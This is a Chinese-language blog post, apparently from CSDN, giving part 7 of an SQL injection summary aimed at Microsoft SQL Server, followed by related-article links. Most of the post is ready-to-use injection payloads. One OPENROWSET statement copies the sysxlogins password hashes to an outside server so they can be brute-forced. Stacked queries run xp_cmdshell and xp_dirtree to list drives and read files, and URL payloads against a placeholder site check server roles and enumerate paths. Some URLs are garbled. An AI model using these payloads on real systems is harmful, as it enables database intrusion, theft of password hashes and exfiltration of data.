SQL注射总结(7)

最新推荐文章于 2022-01-23 16:27:18 发布
最新推荐文章于 2022-01-23 16:27:18 发布
阅读量1.2k 收藏
点赞数
分类专栏: 通用算法 文章标签: sql insert table network c dos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/metababy/article/details/564904
版权
3、 复制哈西表(HASH)

  这实际上是上述复制 数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins


  得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。

  遍历目录的方法:
  先创建一个临时表:temp

'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动
5';insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 获得子目录列表
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 获得所有子目录的目录树结构,并寸入temp表中

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看某个文件的内容
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc'

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
语句2:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
语句3:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
语句4:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句5:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句6:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
语句7:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句8:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句9:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--
把路径写到表中去:
_blank>http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:/'-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:/web'--
语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-

关键字:软件  服务器  qq  os  msn  dos   美女 电影 小说 音乐 无极 汽车 MP3

自由程序员
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL旁注精华珍藏版代码.doc
05-30
SQL旁注精华珍藏版代码.doc SQL旁注精华珍藏版代码.doc
深入浅出SQL注入
爱技术 爱生活
11-11 2817
之前在做学生信息管理系统和机房收费系统的时候,对于SQL注入的问题已经是司空见惯,但是并没有真正的地形象生动的理解SQL注入到底是什么玩意儿.直到这次做牛腩才在牛老师的举例之下,明白了原来SQL注入是真的很危险啊. 问题提出     我们先来构造一个简单的添加新闻类别的程序,在动态网页上添加一个TextBox控件,一个Button控件,一个GridView控件。布局如下图所示: 然后
37. 注入篇——旁注
Fly_鹏程万里
03-10 2504
旁注简介旁注是互联网黑客入侵常见的一种手段,多数用来攻击虚拟主机。其原理是利用统一主机上其他站点的安全漏洞获取服务器上的一个WEBshell,从而获得一定的操作权限,进而利用虚拟目录权限的配置不严格或者通过“提权”来获取管理员权限后在跳转到目标网站的web虚拟目录中。同一台服务器入侵由于现在互联网的发展,使更多的人都拥有自己的网站。但是如果自己买服务器,买带宽的话就会花费很多钱,这样长久下去的资金...
Sql注入(盲注)
永不垂头的博客
07-29 269
学习笔记—Sql注入(盲注) 一、盲注实践: select * from users where (id = 1) and 1<(select count() xxx) – and pid > 100; select * from users where (id = 1) and (1<(select count() xxx)); – and pid > 100; select * from users where (id = 1) and 1<(select count
SQL注入问题总结
mmdev
03-19 372
一、SQL注入介绍 SQL注入就是将原本的SQL语句的逻辑结构改变,使得SQL语句的执行结果和原本开发者的意图不一样; 方法:在表单中将命令当作用户输入提交给程序; 二、SQL注入范例 这里我们根据用户登录页面 &lt;form action="" &gt; 用户名:&lt;input type="text" name="username"&gt;&lt;br/&..
Sql注射总结.rar
07-09
本资料“Sql注射总结”是针对这一主题的详细教程,旨在帮助读者理解和防范SQL注入攻击。 首先,了解SQL注入的基础原理至关重要。当用户输入的数据未经充分验证或转义就被拼接到SQL查询语句中,就可能导致SQL注入...
[翻译]SQL注射技术总结文档.7z
08-21
====||目录||===== -------------------- 1、简介 ...7、MYSQL利用 8、服务名和配置 9、在注册表中找VNC密码 10、刺穿IDS认证 11、在MYSQL中使用char()欺骗 12、用注释躲避IDS认证 13、构造无引号的字符串
SQL注射语句的经典总结.docx
01-13
以下是对SQL注入语句的经典总结: 1. **判断注入点**:通常使用`' ; and 1=1`与`' ; and 1=2`组合,如果页面返回相同,说明可能存在注入点,因为两个语句在逻辑上等价,不会改变原SQL语句的结果。 2. **猜表名**:...
SQL注射技术总结文档
01-02
### SQL注射技术总结文档 #### 一、简介 SQL注射是一种常见的网络安全攻击手段,通过将恶意的SQL代码插入到正常的数据请求中,攻击者能够控制数据库执行非授权操作。随着Web应用的普及和发展,SQL注射成为了针对...
SQL旁注精华珍藏版代码
ljhmover的专栏
06-02 739
这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下: insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;, ...这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogi
SQL注入原理(预习作业)转载学习内容
qq_43473164的博客
03-17 594
Sql注入原理 程序员在web开发时,没有过滤敏感字符,绑定变量,导致攻击者可以通过sql灵活多变的语法,构造精心巧妙的语句,不择手段,达成目的,或者通过系统报错,返回对自己有用的信息。 Sql注入环境 需要用到的工具有:apache,mysql,php ,这几个组件可以单独下载安装,不过安装配置过程较为繁琐,还是建议新手直接从网上下载phpstudy ,一个绿色程序,包含上述三个组件,傻瓜化操作...
让你彻底明白sql注入攻击
方志朋的博客
01-06 322
点击上方蓝色“方志朋”,选择“设为星标”回复“666”获取独家整理的学习资料!SQL注入攻击是黑客对数据库进行攻击常用的手段之一,随着B/S模式应用开发的发展,使用这种模式编写应用程序的程...
SQL注入(1)
banying4311的博客
08-06 736
一、注入点的判断及猜解1.加入单引号 ’提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞。2.数字型判断是否有注入;语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)结果:分别返回不同的页面,说明存在注入漏洞.分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询,如果and前后的两条语句都是真的话就不会...
旁注原理
weixin_33797791的博客
03-11 407
  旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。   介绍 旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的...
旁 注 攻 击
weixin_46273733的博客
01-23 3464
旁注攻击 旁注攻击即攻击者在攻击目标时,对目标网站“无从下手”,找不到漏洞时,攻击者就可能会通过具有同一服务器的网站渗透到目标网站,从而获取目标站点的权限。 服务器端Web架构 Web应用程序与数据库 当攻击者在攻击“xxser.com”时,并未发现风险,但通过攻击“secbug.org”得到了数据库的root 权限,这样“xxser.com”的数据可能会被泄露 IP逆向查询 许多网站都提供了基于P到网站的逆向查询功能,通过这类网站攻击者可以查找到部署在同一 Web
什么是旁注?
0ffs3t
10-27 2396
旁注的词典解释是1.正文旁边的小注、2.在书页边上的手写或印刷的注释、3.从旁边流入、4.普降。旁注的计算机术语就是通过目标网站所在的主机上存放的其他网站进行注入攻击的方法。 纠错 编辑摘要 旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。以
初探MSSQL注入
要不,单步调试走起?
12-27 5110
探索MSSQL下,有了SA注入点到底能走到哪一步!
SQL Injection with MySQL
11-11 1445
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
【未知攻焉知防】如何利用旁注渗透入侵服务器站点
胡杨林
05-20 7366
旁注(旁站,其实是同一个意思),顾名思义,就是从旁边的站点注入,是渗透入侵常用的一种手段。通常,一台服务器上有很多个站点,这些站点之间没有必然的联系,是相互独立的,使用的是不同的域名(甚至端口都不同),但是它们却共存在一台服务器上。 如果我们要对某一个站点进行直接渗透无法突破时,那么我们可以对同服务器的其他站点进行渗透,只要能打破一个缺口,就能沦陷服务区上的整个站点,甚至是一个集群。 我们这次以实际的一个站点为例,简要阐述一下旁注的渗透原理及其危害。
SQL注射攻防深度解析:Mssql原理与实践
课程由赵志峰主讲,旨在帮助学习者理解SQL注射的工作机制,掌握基础和高级的手工注入技巧,并学会使用工具进行防御。" 在网络安全中,SQL注射是一种常见的攻击手段,攻击者通过向应用程序输入恶意的SQL语句,以篡改...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值